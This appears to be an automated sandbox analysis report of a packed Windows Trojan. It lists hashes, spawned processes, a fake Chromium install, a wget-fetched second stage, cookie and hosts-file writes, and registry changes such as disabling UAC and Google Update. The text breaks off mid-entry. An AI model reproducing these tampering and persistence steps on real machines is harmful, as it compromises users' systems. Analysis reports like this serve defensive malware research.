MD5: 5a17120a4b4e6bb53a0b07266b199fff
SHA1: 1cc638b1a13225ade482470f6aa897514b7830f9
SHA256: c3843701888ec6a9a46db8f60f2b6179bbd065cf43a3b08ea6273d00718455fe
SSDeep: 24576: aUxvxK4bpyPHlKka9h5fRrUpSg/IpC80EX04t1iN:qJKWUHlKk8h5fRrUMgwL0spuN
Size: 1051350 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-08-27 19:40:54
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

installer.exe:580
Chromium.exe:1116
wget.exe:612
arsiv.exe:792
%original file name%.exe:1676

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process installer.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Chromium.exe (11258 bytes)

The process Chromium.exe:1116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fa.pak (2105 bytes)
%System%\drivers\etc\hosts (269066 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\gu.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ms.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\resources.pak (43124 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ta.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.pak (4545 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.pak (1425 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\mr.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\libpeerconnection.dll (15116 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.pak (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jogoilaonpjembimhekgnboineibhdhf\bg.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (73 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\setting (28 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\icudt.dll (76505 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\uk.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sl.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hi.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome_100_percent.pak (7345 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\it.pak (1281 bytes)
%Documents and Settings%\%current user%\Desktop\Google Chrome.lnk (791 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sw.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.pak (1425 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-TW.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\th.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nb.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\he.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\chrome.dll (360605 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fil.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\nl.pak (1281 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (3 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pl.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ar.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\hu.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\zh-CN.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\am.pak (2105 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bn.pak (3361 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\pingjs.js (34 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sk.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\cs.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\et.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ru.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lv.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ml.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ko.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.pak (4185 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\PepperFlash\pepflashplayer.dll (113356 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ca.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ja.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\te.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\ro.pak (1425 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sr.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fi.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\fr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\kn.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\en-US.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.pak (1281 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\tr.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\el.pak (3073 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\de.dll (10 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\bg.pak (2321 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\vi.dll (9 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@joojlee[1].txt (214 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\da.dll (10 bytes)
%Program Files%\Google\Chrome\Application\chrome.exe (5889 bytes)
%Program Files%\Google\Chrome\Application\30.0.1573.2\Locales\sv.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions (0 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (0 bytes)
%Documents and Settings%\%current user%\Application Data\bg.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\pingjs.js (0 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)

The process wget.exe:612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\arsiv.exe (3878606 bytes)

The process arsiv.exe:792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\da.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\chrome.exe (30992 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\icudt.dll (455362 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.pak (250 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\it.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\he.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\de.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\chrome.dll (794832 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\resources.pak (40311 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\es.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
%Documents and Settings%\%current user%\Application Data\browser\30.0.1573.2\Locales\hi.dll (10 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\__tmp_rar_sfx_access_check_849765 (0 bytes)

The process %original file name%.exe:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (38174 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\installer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RarSFX0\__tmp_rar_sfx_access_check_831828 (0 bytes)

Registry activity

The process installer.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC BA B1 02 CE F8 15 52 E8 99 71 4F F8 3F 77 FE"

The process Chromium.exe:1116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 74 8A 87 1E C4 69 C0 B8 A5 90 6B 82 78 3F CE"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
